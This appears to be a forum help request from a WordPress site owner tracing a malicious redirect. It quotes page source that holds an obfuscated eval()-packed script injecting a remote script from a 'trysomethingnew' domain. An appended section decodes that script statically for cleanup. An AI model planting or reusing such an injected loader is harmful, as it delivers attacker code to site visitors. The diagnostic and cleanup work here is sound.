I am trying to find and understand how a page redirect is happening on a WordPress site. I have taken the site down and am working my way through it, trying to work out where the exploit is.
The redirect seems to go under the name of "trysomethingnew" and I have found reference to this in the page source file looked at through Firefox.
Code:
/style><script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))</script><script type="text/javascript">(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script>
I'm not sure if this is the offending script but it does contain the words "trysomethingnew". I have copied everything between the <script> tags.
Where do I start when trying to find this? I can't make head nor tail of it. Is there anything there to help identify where the script is?
The site is running on a clean install of WordPress (fully updated) and the redirect is not happening now but the script is still there.
Any ideas?
Cheers.
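
The first `<script>` quoted in the post is wrapped in the `eval(function(p,a,c,k,e,d)` packer, which hides a short script behind a word table. The following is an added example, not part of the original post: a static decoder that undoes the substitution without ever calling `eval()`. The function names are illustrative, and it assumes the base-36 token encoder shown in the post (word tables of up to 36 entries).

```javascript
// Added example: static decoder for the "eval(function(p,a,c,k,e,d)" wrapper.
// Nothing here calls eval(); it only undoes the packer's word substitution.

// Constructed sample: the argument tail of the packed call quoted in the post.
const SAMPLE = String.raw`}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))`;

// Matches: }('<template>',<radix>,<count>,'<words>'.split('|')
const PACKED_CALL =
  /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/g;

// Substitute each base-36 token in the template with its word-table entry.
function unpack(template, count, words) {
  const table = new Map();
  for (let i = 0; i < count; i++) {
    const token = i.toString(36); // same encoder as e() in the post's sample
    table.set(token, words[i] || token); // empty entry: token stays literal
  }
  return template.replace(/\b\w+\b/g, (t) => (table.has(t) ? table.get(t) : t));
}

// Find every packed call in page source and return the decoded scripts.
function decodePacked(source) {
  const out = [];
  for (const m of source.matchAll(PACKED_CALL)) {
    // Undo the \' and \\ escapes of the single-quoted JS string literal.
    const template = m[1].replace(/\\(.)/g, '$1');
    out.push(unpack(template, Number(m[3]), m[4].split('|')));
  }
  return out;
}

// Pull out any URL assigned to a .src property in the decoded script.
function injectedSources(decoded) {
  return [...decoded.matchAll(/\.src\s*=\s*'([^']+)'/g)].map((m) => m[1]);
}

const decoded = decodePacked(SAMPLE);
console.log(decoded[0]);
console.log(injectedSources(decoded[0]));
```

The decoded URL never appears literally in the page, because it is assembled from the word table at run time. The strings that do appear in clear text, and so can be searched for in theme files, plugin files and database content, are the word-table entries and the `eval(function(p,a,c,k,e,d)` signature itself.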